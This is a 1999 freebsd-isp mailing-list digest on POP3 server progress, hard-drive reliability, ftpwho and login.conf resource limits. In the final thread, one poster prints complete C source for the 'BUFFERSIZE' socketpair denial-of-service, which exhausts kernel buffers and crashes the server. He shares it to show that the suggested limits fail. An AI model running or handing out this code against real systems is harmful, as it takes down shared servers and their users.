leif@neland.dk) Received: from gina (gina.neland.dk [192.168.0.14]) by arnold.neland.dk (8.9.3/8.9.3) with SMTP id XAA30912 for ; Wed, 3 Nov 1999 23:55:01 +0100 (CET) (envelope-from leif@neland.dk) Message-ID: <018a01bf264e$765a57c0$0e00a8c0@neland.dk> From: "Leif Neland" To: Subject: Query pop3-server of progress Date: Wed, 3 Nov 1999 23:49:13 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sometimes a customer calls support saying he can't get his mail from the = pop3-server. Often it's just because the progress-meter doesn't move very quickly = when his mailbox contains an 8MB-attachment containing a funny avi a = 'friend' has sent him. We're using qpopper, but wouldn't mind changing if something else could = provide this. Could this be implemented, and has somebody done it? pid=3D`ps axuw|grep popper|grep $username|grep -v grep` kill -USR1 $pid sleep 5 cat /tmp/popstat.$pid The pop3-server should dump some stats in a file, eg number of files sent and total number of bytes sent and total perhaps even transfer speed and eta. This could be accessed from a cgi Good idea, right? :-) Leif =20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 16: 2: 4 1999 Delivered-To: freebsd-isp@freebsd.org Received: from inc.net (mailhost.inc.net [204.95.160.26]) by hub.freebsd.org (Postfix) with ESMTP id 3670415138 for ; Wed, 3 Nov 1999 16:01:54 -0800 (PST) (envelope-from steve@inc.net) Received: from inc.net (niki.noc.inc.net [204.95.194.201]) by inc.net (8.9.3/8.9.1) with ESMTP id RAA18449; Wed, 3 Nov 1999 17:57:51 -0600 (CST) Message-ID: <3820CC39.306DA8DC@inc.net> Date: Wed, 03 Nov 1999 17:58:49 -0600 From: Steve Kaczkowski Organization: inc.Net X-Mailer: Mozilla 4.61 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Bill Vermillion Cc: freebsd-isp@FreeBSD.ORG Subject: Re: BackUp Drive References: <38199841.9483CAE0@tdis.gctc.rssi.ru> <19991029082829.A7680@bilver.magicnet.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Vermillion wrote: > > On Fri, Oct 29, 1999 at 03:51:13PM +0300, Andrew Karjagin spewed forth: > > > First HDD Seagate worked two years and crash! Second HDD Seagate > > worked two years and crash! Now we buy Quantum (there can be > > better) and at us the problem has appeared with purchase of BackUp > > drive. We work with FreeBSD 2.2.6, in future plan to pass on > > FreeBSD 3.*. > > Seagate build drives that last and they build economy drives. > Same with Quantum. I've had low end drives from both fail in short > periods of time to drives that seem to last forver > > > What model of the device of reserve copying well works with given OS's > > (may be IDE or SCSI - based on your experience)? > > I've always used SCSI. As to the Seagate/Quantum, I've only used > the Seagate drives that came out of the design team that used > to build the CDC drives, the Elite's, Baracuddas, Cheetahs, and > the Quantums that were designed by DEC, the Viking on the low end > of the high-end line, and the Atlas products. > > Drives like the Seagate Hawks, and Quantum Fireball's, always > seemed to fail prematurely, at least for me. > > Longest I've had a drive run was seven years two months and about > 10 days. An old Maxtor, running 24x7 in a Usenet news node. [I > kept it running for the last two years just to see how long it > would go] IMHO the best drives out there are IBMs, VERY reliable,fast,quite,low heat. You probably want to look at the ES versions since these are their high availability disks.. I wouldn't buy any other drive at this point, for home or work related.. Good luck, -- Steve Kaczkowski Time Warner Telecom/inc.Net steve@inc.net (414)908-9012 http://www.inc.net (603)737-9209 Fax To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 16:54: 6 1999 Delivered-To: freebsd-isp@freebsd.org Received: from mensa.national.com.au (mensa.national.com.au [203.57.240.81]) by hub.freebsd.org (Postfix) with ESMTP id CA4E514CF0 for ; Wed, 3 Nov 1999 16:53:42 -0800 (PST) (envelope-from nconedd@mensa.national.com.au) Received: (from nconedd@localhost) by mensa.national.com.au (8.8.8+Sun/8.8.8) id LAA10840; Thu, 4 Nov 1999 11:52:12 +1100 (EST) From: Enno Davids Message-Id: <199911040052.LAA10840@mensa.national.com.au> Subject: Re: BackUp Drive To: steve@inc.net (Steve Kaczkowski) Date: Thu, 4 Nov 1999 11:52:12 +1100 (EST) Cc: bill@bilver.magicnet.net, freebsd-isp@FreeBSD.ORG In-Reply-To: <3820CC39.306DA8DC@inc.net> from "Steve Kaczkowski" at Nov 3, 99 05:58:49 pm X-Mailer: ELM [version 2.5 PL0a3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Its also my experience that avoiding new models/new technologies for 3-6 months isn't an altogether bad strategy. So, while the new 50Gb Seagates look nice, I'll wait till January before committing to them. Completely agree on the economy drive vs. quality drive argument too, although when a 17Gb IDE Seagate can be had for ~A$200 it may be hard to tell the difference. I too have seen the economy effect with most manufacturers though. It seems a natural outcome of building to a price rather than building to a level of performance. Enno. | Bill Vermillion wrote: | > | > On Fri, Oct 29, 1999 at 03:51:13PM +0300, Andrew Karjagin spewed forth: | > | > > First HDD Seagate worked two years and crash! Second HDD Seagate | > > worked two years and crash! Now we buy Quantum (there can be | > > better) and at us the problem has appeared with purchase of BackUp | > > drive. We work with FreeBSD 2.2.6, in future plan to pass on | > > FreeBSD 3.*. | > | > Seagate build drives that last and they build economy drives. | > Same with Quantum. I've had low end drives from both fail in short | > periods of time to drives that seem to last forver | > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 16:58:29 1999 Delivered-To: freebsd-isp@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 0305B14CEF for ; Wed, 3 Nov 1999 16:58:20 -0800 (PST) (envelope-from freebsd@deepwell.com) Received: (qmail 29298 invoked from network); 4 Nov 1999 01:47:17 -0000 Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 4 Nov 1999 01:47:17 -0000 Message-Id: <4.2.0.58.19991103165506.00d02880@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 (demo) Date: Wed, 03 Nov 1999 16:56:55 -0800 To: Enno Davids , freebsd-isp@freebsd.org From: Deepwell Internet Subject: Re: BackUp Drive In-Reply-To: <199911040052.LAA10840@mensa.national.com.au> References: <3820CC39.306DA8DC@inc.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Also, computer components have reached a commodity level and people are replacing individual components at a much faster rate. 3 years is probably beyond what they estimate the life of a drive to be. At 11:52 AM 11/4/99 +1100, you wrote: >Its also my experience that avoiding new models/new technologies for 3-6 >months isn't an altogether bad strategy. So, while the new 50Gb Seagates >look nice, I'll wait till January before committing to them. > >Completely agree on the economy drive vs. quality drive argument too, >although when a 17Gb IDE Seagate can be had for ~A$200 it may be hard to >tell the difference. > >I too have seen the economy effect with most manufacturers though. It >seems a natural outcome of building to a price rather than building to a >level of performance. > > >Enno. > > >| Bill Vermillion wrote: >| > >| > On Fri, Oct 29, 1999 at 03:51:13PM +0300, Andrew Karjagin spewed forth: >| > >| > > First HDD Seagate worked two years and crash! Second HDD Seagate >| > > worked two years and crash! Now we buy Quantum (there can be >| > > better) and at us the problem has appeared with purchase of BackUp >| > > drive. We work with FreeBSD 2.2.6, in future plan to pass on >| > > FreeBSD 3.*. >| > >| > Seagate build drives that last and they build economy drives. >| > Same with Quantum. I've had low end drives from both fail in short >| > periods of time to drives that seem to last forver >| > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-isp" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 17:34: 4 1999 Delivered-To: freebsd-isp@freebsd.org Received: from staff.accessus.net (staff.accessus.net [209.145.151.3]) by hub.freebsd.org (Postfix) with ESMTP id 968241513C for ; Wed, 3 Nov 1999 17:33:58 -0800 (PST) (envelope-from doogie@staff.accessus.net) Received: by staff.accessus.net with Internet Mail Service (5.5.2650.21) id ; Wed, 3 Nov 1999 19:33:42 -0600 Message-ID: From: Jason Young To: 'Leif Neland' , freebsd-isp@FreeBSD.ORG Subject: RE: Query pop3-server of progress Date: Wed, 3 Nov 1999 19:33:41 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01BF2664.A086AC0E" Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01BF2664.A086AC0E Content-Type: text/plain; charset="iso-8859-1" qpopper contains some debug functionality. Make sure it's compiled with the DEBUG option, and then if you suspect something's wrong, switch your inetd configuration from "popper -options" to "popper -options -d" and you'll get complete session traces shoveled into syslog. Be sure to have syslog send the data somewhere, I don't think it does by default. That's what I've been doing when I've been trying to figure out various popper problems or customer complaints. I found a bug in the latest version where it truncates long lines that some mailers send (commonly HTML versions of a message in attachments) and then puts the termination character on the end of a line instead of on a line by itself. That generated a lot of support calls about apparently okay messages blocking up their mailbox and having to be removed. Their mail client would hang and eventually time out because of the protocol desync - popper's waiting for a command, client is waiting for more mail. I'm 95% sure this applies to all poppers, but our local one is hacked to handle qmail maildir so I'm not sure. You can tell if this is causing a particular hang by doing POP3 protocol by hand by telnetting to port 110 and retr'ing the message in question, and seeing if the terminating '.' character doesn't get put on a line by itself. I hacked around it, but haven't gotten around to attempting a proper fix yet. If you really wanted status info exactly like you described below, and felt like doing a little hacking on qpopper, I'd use 'setproctitle' to express status info. It could show something like this: # ps -ax 77290 ?? Ss 0:17.06 popper: waiting for command (popper) 77291 ?? Ss 0:17.06 popper: sending msg 29 (74%) (popper) 77292 ?? Ss 0:17.06 popper: updating mailbox (popper) Sendmail and some FTP daemons do this. Be sure to also update the status line when it's spending time in the update phase copying around mailbox data. Hmm, I might just do that myself now that the idea's out there. :) Jason Young accessUS Chief Network Engineer > -----Original Message----- > From: Leif Neland [mailto:leif@neland.dk] > Sent: Wednesday, November 03, 1999 4:49 PM > To: freebsd-isp@FreeBSD.ORG > Subject: Query pop3-server of progress > > > Sometimes a customer calls support saying he can't get his > mail from the pop3-server. > > Often it's just because the progress-meter doesn't move very > quickly when his mailbox contains an 8MB-attachment > containing a funny avi a 'friend' has sent him. > > We're using qpopper, but wouldn't mind changing if something > else could provide this. > > Could this be implemented, and has somebody done it? > > pid=`ps axuw|grep popper|grep $username|grep -v grep` > kill -USR1 $pid > sleep 5 > cat /tmp/popstat.$pid > > The pop3-server should dump some stats in a file, > eg number of files sent and total > number of bytes sent and total > perhaps even transfer speed and eta. > > This could be accessed from a cgi > > Good idea, right? :-) > > Leif > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > ------_=_NextPart_001_01BF2664.A086AC0E Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable RE: Query pop3-server of progress

qpopper contains some debug functionality. Make sure = it's compiled with the DEBUG option, and then if you suspect = something's wrong, switch your inetd configuration from "popper = -options" to "popper -options -d" and you'll get = complete session traces shoveled into syslog. Be sure to have syslog = send the data somewhere, I don't think it does by default. That's what = I've been doing when I've been trying to figure out various popper = problems or customer complaints.

I found a bug in the latest version where it = truncates long lines that some mailers send (commonly HTML versions of = a message in attachments) and then puts the termination character on = the end of a line instead of on a line by itself.  That generated = a lot of support calls about apparently okay messages blocking up their = mailbox and having to be removed. Their mail client would hang and = eventually time out because of the protocol desync - popper's waiting = for a command, client is waiting for more mail. I'm 95% sure this = applies to all poppers, but our local one is hacked to handle qmail = maildir so I'm not sure.

You can tell if this is causing a particular hang by = doing POP3 protocol by hand by telnetting to port 110 and retr'ing the = message in question, and seeing if the terminating '.' character = doesn't get put on a line by itself. I hacked around it, but haven't = gotten around to attempting a proper fix yet.

If you really wanted status info exactly like you = described below, and felt like doing a little hacking on qpopper, I'd = use 'setproctitle' to express status info. It could show something like = this:

# ps -ax
77290  ??  Ss     = 0:17.06 popper: waiting for command (popper)
77291  ??  Ss     = 0:17.06 popper: sending msg 29 (74%) (popper)
77292  ??  Ss     = 0:17.06 popper: updating mailbox (popper)

Sendmail and some FTP daemons do this. Be sure to = also update the status line when it's spending time in the update phase = copying around mailbox data. Hmm, I might just do that myself now that = the idea's out there. :)

Jason Young
accessUS Chief Network Engineer

> -----Original Message-----
> From: Leif Neland [mailto:leif@neland.dk]
> Sent: Wednesday, November 03, 1999 4:49 = PM
> To: freebsd-isp@FreeBSD.ORG
> Subject: Query pop3-server of progress
>
>
> Sometimes a customer calls support saying he = can't get his
> mail from the pop3-server.
>
> Often it's just because the progress-meter = doesn't move very
> quickly when his mailbox contains an = 8MB-attachment
> containing a funny avi a 'friend' has sent = him.
>
> We're using qpopper, but wouldn't mind changing = if something
> else could provide this.
>
> Could this be implemented, and has somebody = done it?
>
> pid=3D`ps axuw|grep popper|grep $username|grep = -v grep`
> kill -USR1 $pid
> sleep 5
> cat /tmp/popstat.$pid
>
>  The pop3-server should dump some stats in = a file,
> eg number of files sent and total
> number of bytes sent and total
> perhaps even transfer speed and eta.
>
> This could be accessed from a cgi
>
> Good idea, right? :-)
>
> Leif

>
>
>
> To Unsubscribe: send mail to = majordomo@FreeBSD.org
> with "unsubscribe freebsd-isp" in the = body of the message
>

------_=_NextPart_001_01BF2664.A086AC0E-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 17:43:24 1999 Delivered-To: freebsd-isp@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id B05E7156DA for ; Wed, 3 Nov 1999 17:43:09 -0800 (PST) (envelope-from freebsd@deepwell.com) Received: (qmail 1742 invoked from network); 4 Nov 1999 02:32:18 -0000 Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 4 Nov 1999 02:32:18 -0000 Message-Id: <4.2.0.58.19991103174036.01cf5760@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 (demo) Date: Wed, 03 Nov 1999 17:41:50 -0800 To: freebsd-isp@freebsd.org From: Deepwell Internet Subject: ftpwho Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On my home Linux system I have a cool command called ftpwho that lets me see who is using ftp right now and what they're doing. Is there a similar command for FreeBSD? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 18: 4:51 1999 Delivered-To: freebsd-isp@freebsd.org Received: from lanshark.lanminds.com (lanshark.lanminds.com [208.25.68.5]) by hub.freebsd.org (Postfix) with ESMTP id ECE4514D81 for ; Wed, 3 Nov 1999 18:04:49 -0800 (PST) (envelope-from todd@lmi.net) Received: from drtboi.lanminds.com (drtboi.lmi.net [208.25.91.219]) by lanshark.lanminds.com (8.8.8/8.8.7) with ESMTP id SAA03513; Wed, 3 Nov 1999 18:04:43 -0800 (PST) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <4.2.0.58.19991103174036.01cf5760@mail1.dcomm.net> Date: Wed, 03 Nov 1999 18:04:42 -0800 (PST) Reply-To: todd@lmi.net Organization: LMI.net From: Todd Meister To: Deepwell Internet Subject: RE: ftpwho Cc: freebsd-isp@FreeBSD.ORG Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 04-Nov-99 Deepwell Internet wrote: > On my home Linux system I have a cool command called ftpwho that lets me > see who is using ftp right now and what they're doing. Is there a similar > command for FreeBSD? As far as I know, that's part of the Washington University FTP daemon (wu-ftpd). It's in the ports collection. -Todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 23:15:49 1999 Delivered-To: freebsd-isp@freebsd.org Received: from ns1.i-p-d.nl (ns1.i-p-d.nl [208.239.240.129]) by hub.freebsd.org (Postfix) with ESMTP id D062E14E4F for ; Wed, 3 Nov 1999 23:15:46 -0800 (PST) (envelope-from holland@i-p-d.nl) Received: from ron-600 (xs02-064.support.nl [195.114.229.64]) by ns1.i-p-d.nl (8.8.8/8.8.8) with ESMTP id IAA05478; Thu, 4 Nov 1999 08:08:19 +0100 (CET) (envelope-from holland@i-p-d.nl) Message-Id: <199911040708.IAA05478@ns1.i-p-d.nl> From: "Ron den Ouden" Organization: IPD Hosting & Design To: Deepwell Internet Date: Thu, 4 Nov 1999 08:16:24 +0100 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: ftpwho Reply-To: holland@i-p-d.nl Cc: freebsd-isp@FreeBSD.ORG In-reply-to: <4.2.0.58.19991103174036.01cf5760@mail1.dcomm.net> X-mailer: Pegasus Mail for Win32 (v3.12a) Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 3 Nov 99, at 17:41, Deepwell Internet wrote: > On my home Linux system I have a cool command called ftpwho that lets me > see who is using ftp right now and what they're doing. Is there a similar > command for FreeBSD? > Proftpd supports ftpwho. Once installed you will be able to use that command. Its handy to use the command through cgi so you will have an www overview of ftp action on your boxes. www.proftpd.org Regards Ron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Wed Nov 3 23:37:18 1999 Delivered-To: freebsd-isp@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id B0794150FA for ; Wed, 3 Nov 1999 23:37:10 -0800 (PST) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (2168 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 4 Nov 1999 01:36:07 -0600 (CST) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Thu, 4 Nov 1999 01:36:07 -0600 (CST) From: James Wyatt To: Ron den Ouden Cc: Deepwell Internet , freebsd-isp@FreeBSD.ORG Subject: Re: ftpwho In-Reply-To: <199911040708.IAA05478@ns1.i-p-d.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 4 Nov 1999, Ron den Ouden wrote: > On 3 Nov 99, at 17:41, Deepwell Internet wrote: > > On my home Linux system I have a cool command called ftpwho that lets me > > see who is using ftp right now and what they're doing. Is there a similar > > command for FreeBSD? > > > Proftpd supports ftpwho. Once installed you will be able to use that > command. Its handy to use the command through cgi so you will have an > www overview of ftp action on your boxes. > > www.proftpd.org (btw: thanks for having another non-NT ProFTPd server I could test with) I *really* wish ProFTP would fix 'sunique' support. Try this: ftp ftp> sunique Store unique on. ftp> cd incoming ftp> put local: remote: 200 PORT command successful. 500 STOU not understood. ftp> quit or better yet: ftp ftp> sunique Store unique on. ftp> cd incoming ftp> mkdir 257 MKD command successful. ftp> put local: remote: 200 PORT command successful. 500 STOU not understood. ftp> quit Both FreeBSD and WU FTPds dutifully do as they should in the first case and correctly make a '.1' file in the second case. You will notice that you don't have to send an 'STOU' command to have it misunderstood. Jeez, even NT Server's FTPd does better than this. Of course our vendor's default FTP sending script for EDI messaging depends on this feature working, so ProFTP was replaced with WarFTPd on their machine. It has it's own faults, but this part works. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Thu Nov 4 2:50:26 1999 Delivered-To: freebsd-isp@freebsd.org Received: from proteus.eclipse.net.uk (proteus.eclipse.net.uk [195.188.32.118]) by hub.freebsd.org (Postfix) with ESMTP id 8D8D614FFA for ; Thu, 4 Nov 1999 02:50:19 -0800 (PST) (envelope-from sh@eclipse.net.uk) Received: from eclipse.net.uk (elara.eclipse.net.uk [195.188.32.31]) by proteus.eclipse.net.uk (Postfix) with ESMTP id B7B939B0A; Thu, 4 Nov 1999 10:47:58 +0000 (GMT) Message-ID: <38216480.E90BA405@eclipse.net.uk> Date: Thu, 04 Nov 1999 10:48:32 +0000 From: Stuart Henderson Organization: Eclipse Networking X-Mailer: Mozilla 4.7 [en] (WinNT; U) X-Accept-Language: en-GB MIME-Version: 1.0 To: Leif Neland Cc: freebsd-isp@FreeBSD.ORG Subject: Re: Query pop3-server of progress References: <018a01bf264e$765a57c0$0e00a8c0@neland.dk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Sometimes a customer calls support saying he can't get his > mail from the pop3-server. Often it's just because the progress-meter > doesn't move very quickly when his mailbox contains an 8MB-attachment > containing a funny avi a 'friend' has sent him. > > We're using qpopper, but wouldn't mind changing if something else > could provide this. Something that might be useful, although not an exact answer to your q. :) qpopper, unless compiled in server mode, will make a copy of the mailbox before working on it. That will add some considerable time to retrieve, particularly on a busy server, particularly with large attachments. I don't remember how to enable it on popper (some alternative pop3ds are: cucipop, in ports, Solar Designer's popa3d, at http://www.openwall.com/popa3d, neither of those make a copy of the mailbox. others can be found at http://freshmeat.net/appindex/daemons/pop3.html). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Thu Nov 4 17:59:14 1999 Delivered-To: freebsd-isp@freebsd.org Received: from richard2.pil.net (richard2.pil.net [207.8.164.9]) by hub.freebsd.org (Postfix) with SMTP id 0582514C57 for ; Thu, 4 Nov 1999 17:58:59 -0800 (PST) (envelope-from up@pil.net) Received: (qmail 26278 invoked by uid 1825); 5 Nov 1999 01:56:33 -0000 Date: Thu, 4 Nov 1999 20:56:33 -0500 (EST) From: X-Sender: up@richard2.pil.net To: freebsd-isp@freebsd.org Subject: login.conf and resource limits Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm new to the concept of login classes and /etc/login.conf. I need to set limits on shell users resources to prevent things like the BUFFERSIZE DoS attack, but what I've tried here isn't working: default:\ :copyright=/etc/COPYRIGHT:\ :welcome=/etc/motd:\ :setenv=MAIL=/home/$/Maildir,BLOCKSIZE=K:\ :path=~/bin /bin /usr/bin /usr/local/bin:\ :nologin=/var/run/nologin:\ :cputime=unlimited:\ :datasize=20M:\ :stacksize=4M:\ :memorylocked=8M:\ :memoryuse=16M:\ :filesize=10M:\ :coredumpsize=10M:\ :openfiles=48:\ :maxproc=64:\ :priority=0:\ :ignoretime@:\ :umask=022: This is what I came up with after checking out the man pages and examples in login.conf. If someone who's addressed this has a good example default config, that would be very helpful. TIA, James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am ========================================================================= ISPF 3 - The Forum for ISPs by ISPs(tm) || Nov 15-17, 1999, New Orleans 3 days of clues, news, and views from the industry's best and brightest. Visit for information and registration. ========================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Thu Nov 4 18:56: 3 1999 Delivered-To: freebsd-isp@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 3390E157A9 for ; Thu, 4 Nov 1999 18:55:51 -0800 (PST) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA26189; Thu, 4 Nov 1999 21:53:09 -0500 (EST) From: mike@sentex.net (Mike Tancsa) To: up@3.am Cc: freebsd-isp@freebsd.org Subject: Re: login.conf and resource limits Date: Fri, 05 Nov 1999 02:53:08 GMT Message-ID: <38224635.260144868@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 4 Nov 1999 21:00:01 -0500, in sentex.lists.freebsd.isp you wrote: > >This is what I came up with after checking out the man pages and examples >in login.conf. If someone who's addressed this has a good example default >config, that would be very helpful. shellu:\ :cputime=infinity:\ :datasize-cur=8M:\ :datasize-max=8M:\ :stacksize-cur=4M:\ :stacksize-max=4M:\ :memorylocked-cur=10M:\ :memorylocked-max=10M:\ :memoryuse-cur=10M:\ :memoryuse-max=10M:\ :filesize=infinity:\ :coredumpsize=infinity:\ :maxproc-cur=5:\ :maxproc-max=5:\ :openfiles-cur=64:\ :openfiles-max=64:\ :priority=0:\ :requirehome@:\ :umask=022:\ :tc=auth-defaults: is what I use for my casual shell users... Dont forget cap_mkdb /etc/login.conf ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada "Given enough time, 100 monkeys on 100 routers could setup a national IP network." (KDW2) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Thu Nov 4 20:22: 5 1999 Delivered-To: freebsd-isp@freebsd.org Received: from cs1.cityscope.net (cs1.cityscope.net [206.222.183.2]) by hub.freebsd.org (Postfix) with ESMTP id 01A6215817 for ; Thu, 4 Nov 1999 20:22:02 -0800 (PST) (envelope-from ingrid@cityscope.net) Received: from cityscope.net (isdn130.cityscope.net [209.16.49.130]) by cs1.cityscope.net (8.9.3/8.9.0) with ESMTP id WAA24571 for ; Thu, 4 Nov 1999 22:19:34 -0600 (CST) Message-ID: <38225B50.2339BA1F@cityscope.net> Date: Thu, 04 Nov 1999 22:21:36 -0600 From: Ingrid Kast Fuller X-Mailer: Mozilla 4.7 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-isp@freebsd.org Subject: Re: login.conf and resource limits References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'd like to see an example of how some of the other ISPs are handling mailbox accounts using login classes i login.conf. up@3.am wrote: > > I'm new to the concept of login classes and /etc/login.conf. I need to > set limits on shell users resources to prevent things like the BUFFERSIZE > DoS attack, but what I've tried here isn't working: > > default:\ > :copyright=/etc/COPYRIGHT:\ > :welcome=/etc/motd:\ > :setenv=MAIL=/home/$/Maildir,BLOCKSIZE=K:\ > :path=~/bin /bin /usr/bin >... ***************************** Ingrid Kast Fuller CityScope Computer Services CityScope Net 3910 Fairmont Parkway Suite K Pasadena, Texas 77504-3066 1 281-998-CITY (2489) Email: ingrid@cityscope.net Web: http://www.cityscope.net ****************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message From owner-freebsd-isp Thu Nov 4 20:36:36 1999 Delivered-To: freebsd-isp@freebsd.org Received: from richard2.pil.net (richard2.pil.net [207.8.164.9]) by hub.freebsd.org (Postfix) with SMTP id CE6B214DF3 for ; Thu, 4 Nov 1999 20:36:33 -0800 (PST) (envelope-from up@pil.net) Received: (qmail 9913 invoked by uid 1825); 5 Nov 1999 04:36:03 -0000 Date: Thu, 4 Nov 1999 23:36:03 -0500 (EST) From: X-Sender: up@richard2.pil.net To: Mike Tancsa Cc: freebsd-isp@freebsd.org Subject: Re: login.conf and resource limits In-Reply-To: <38224635.260144868@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I got news for you, that ain't going to stop the DoS. Compile and run this code as a user from your shellu class It will crash your server, so don't do it on a production box (BTW, I had checked the security list archives and saw a thread on this, but no answers that worked): #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } On Fri, 5 Nov 1999, Mike Tancsa wrote: > On 4 Nov 1999 21:00:01 -0500, in sentex.lists.freebsd.isp you 